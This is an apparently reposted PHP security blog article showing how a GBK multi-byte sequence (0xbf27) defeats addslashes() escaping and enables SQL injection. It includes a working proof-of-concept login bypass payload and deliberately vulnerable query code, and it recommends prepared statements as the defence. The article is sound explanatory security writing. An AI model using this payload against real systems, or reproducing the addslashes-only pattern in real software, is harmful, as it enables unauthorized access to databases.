PHP 运用addslashes() Versus mysql_real_escape_string() SQL防注入

Last month, I discussed Google's XSS Vulnerability and provided an example that demonstrates it. I was hoping to highlight why character encoding consistency is important, but apparently the addslashes() versus mysql_real_escape_string() debate continues. Demonstrating Google's XSS vulnerability is pretty easy. Demonstrating an SQL injection attack that is immune to addslashes() is a bit more involved, but still pretty straightforward.

In GBK, 0xbf27 is not a valid multi-byte character, but 0xbf5c is. Interpreted as single-byte characters, 0xbf27 is 0xbf (¿) followed by 0x27 ('), and 0xbf5c is 0xbf (¿) followed by 0x5c (\).

How does this help? If I want to attempt an SQL injection attack against a MySQL database, having single quotes escaped with a backslash is a bummer. If you're using addslashes(), however, I'm in luck. All I need to do is inject something like 0xbf27, and addslashes() modifies this to become 0xbf5c27, a valid multi-byte character followed by a single quote. In other words, I can successfully inject a single quote despite your escaping. That's because 0xbf5c is interpreted as a single character, not two. Oops, there goes the backslash.

I'm going to use MySQL 5.0 and PHP's mysqli extension for this demonstration. If you want to try this yourself, make sure you're using GBK. I just changed /etc/my.cnf, but that's because I'm testing locally:

Toggle Code View

[client]
default-character-set=GBK
  1. [client]
  2. default-character-set=GBK

Create a table called users:

Toggle Code View

CREATE TABLE users (
    username VARCHAR(32) CHARACTER SET GBK,
    password VARCHAR(32) CHARACTER SET GBK,
    PRIMARY KEY (username)
);
  1. CREATE TABLE users (
  2. username VARCHAR(32) CHARACTER SET GBK,
  3. password VARCHAR(32) CHARACTER SET GBK,
  4. PRIMARY KEY (username)
  5. );

The following script mimics a situation where only addslashes() (or magic_quotes_gpc) is used to escape the data being used in a query:

Toggle Code View

<?php
 
$mysql = array();
 
$db = mysqli_init();
$db->real_connect('localhost', 'myuser', 'mypass', 'mydb');
 
/* SQL Injection Example */
$_POST['username'] = chr(0xbf) .
                     chr(0x27) .
                     ' OR username = username /*';
$_POST['password'] = 'guess';
 
$mysql['username'] = addslashes($_POST['username']);
$mysql['password'] = addslashes($_POST['password']);
 
$sql = "SELECT *
        FROM   users
        WHERE  username = '{$mysql['username']}'
        AND    password = '{$mysql['password']}'";
 
$result = $db->query($sql);
 
if ($result->num_rows) {
    /* Success */
} else {
    /* Failure */
}
 
?>
  1. <?php
  2.  
  3. $mysql = array();
  4.  
  5. $db = mysqli_init();
  6. $db->real_connect('localhost', 'myuser', 'mypass', 'mydb');
  7.  
  8. /* SQL Injection Example */
  9. $_POST['username'] = chr(0xbf) .
  10. chr(0x27) .
  11. ' OR username = username /*';
  12. $_POST['password'] = 'guess';
  13.  
  14. $mysql['username'] = addslashes($_POST['username']);
  15. $mysql['password'] = addslashes($_POST['password']);
  16.  
  17. $sql = "SELECT *
  18. FROM users
  19. WHERE username = '{$mysql['username']}'
  20. AND password = '{$mysql['password']}'";
  21.  
  22. $result = $db->query($sql);
  23.  
  24. if ($result->num_rows) {
  25. /* Success */
  26. } else {
  27. /* Failure */
  28. }
  29.  
  30. ?>

Despite the use of addslashes(), I'm able to log in successfully without knowing a valid username or password. I can simply exploit the SQL injection vulnerability.

To avoid this type of vulnerability, use mysql_real_escape_string(), prepared statements, or any of the major database abstraction libraries.

This type of attack is possible with any character encoding where there is a valid multi-byte character that ends in 0x5c, because addslashes() can be tricked into creating a valid multi-byte character instead of escaping the single quote that follows. UTF-8 does not fit this description.

转载于:https://www.cnblogs.com/voswin/articles/1497349.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值